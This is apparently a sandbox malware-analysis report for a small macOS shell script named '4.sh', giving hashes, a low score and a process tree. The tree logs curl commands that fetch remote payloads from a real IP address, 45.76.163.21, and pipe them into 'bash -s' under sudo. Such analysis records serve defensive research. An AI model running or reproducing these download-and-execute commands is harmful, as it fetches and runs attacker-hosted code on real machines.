72038995c995accf5f3c9ab4c3a1a6754a109c422563701c9cc16811de590b80 | Triage

Submit
Reports

Overview

overview

1

Static

static

4.sh

macos-10.15-amd64

1

Analysis

max time kernel
144s
max time network
145s
platform
macos_amd64
resource
macos-20220504-en
resource tags

arch:amd64arch:i386image:macos-20220504-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
10-10-2022 20:49

Sharing

Static task

static1

Behavioral task

behavioral1

Sample

4.sh

Resource

macos-20220504-en

macos-10.15-amd64

0 signatures

150 seconds

Report Analysis Logs

General

Target

4.sh
Size

141B
MD5

2f5409b9127ffffbbec9de5313c62967
SHA1

3077013da74c551a90e261925ae13033adbbe7ff
SHA256

72038995c995accf5f3c9ab4c3a1a6754a109c422563701c9cc16811de590b80
SHA512

764f40d6c3887636f42c1aab55438b4da6cf88fbeb243a4b128ed981d5a6680804137c83435b97cb4e21492e168ac4e8e16fdfd8b0305d973b50c1a75c119ee3

Score

1^/10

Malware Config

Signatures

Processes

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/4.sh\""
1⤵
PID:493

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/4.sh\""
1⤵
PID:493

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/4.sh\""
1⤵
PID:493

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/4.sh
1⤵
PID:493

/usr/bin/sudo
sudo /bin/zsh -c /Users/run/4.sh
1⤵
PID:493
- /bin/zsh
  /bin/zsh -c /Users/run/4.sh
  2⤵
  PID:506
- /bin/zsh
  /bin/zsh -c /Users/run/4.sh
  2⤵
  PID:506
- /Users/run/4.sh
  /Users/run/4.sh
  2⤵
  PID:506
- /Users/run/4.sh
  /Users/run/4.sh
  2⤵
  PID:506
- /bin/sh
  sh /Users/run/4.sh
  2⤵
  PID:506
- /bin/sh
  sh /Users/run/4.sh
  2⤵
  PID:506
- /bin/bash
  sh /Users/run/4.sh
  2⤵
  PID:506
- /bin/bash
  sh /Users/run/4.sh
  2⤵
  PID:506
- - /bin/bash
    bash -s
    3⤵
    PID:508
- - /bin/bash
    bash -s
    3⤵
    PID:508
  - - /bin/bash
      bash -s
      4⤵
      PID:517
  - - /bin/bash
      bash -s
      4⤵
      PID:517
  - - /usr/bin/curl
      curl -A O -o- -L http://45.76.163.21:55413/a
      4⤵
      PID:516
  - - /usr/bin/curl
      curl -A O -o- -L http://45.76.163.21:55413/a
      4⤵
      PID:516
- - /usr/bin/curl
    curl http://45.76.163.21:8001/1.sh
    3⤵
    PID:507
- - /usr/bin/curl
    curl http://45.76.163.21:8001/1.sh
    3⤵
    PID:507

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

© 2018-2025

Terms | Privacy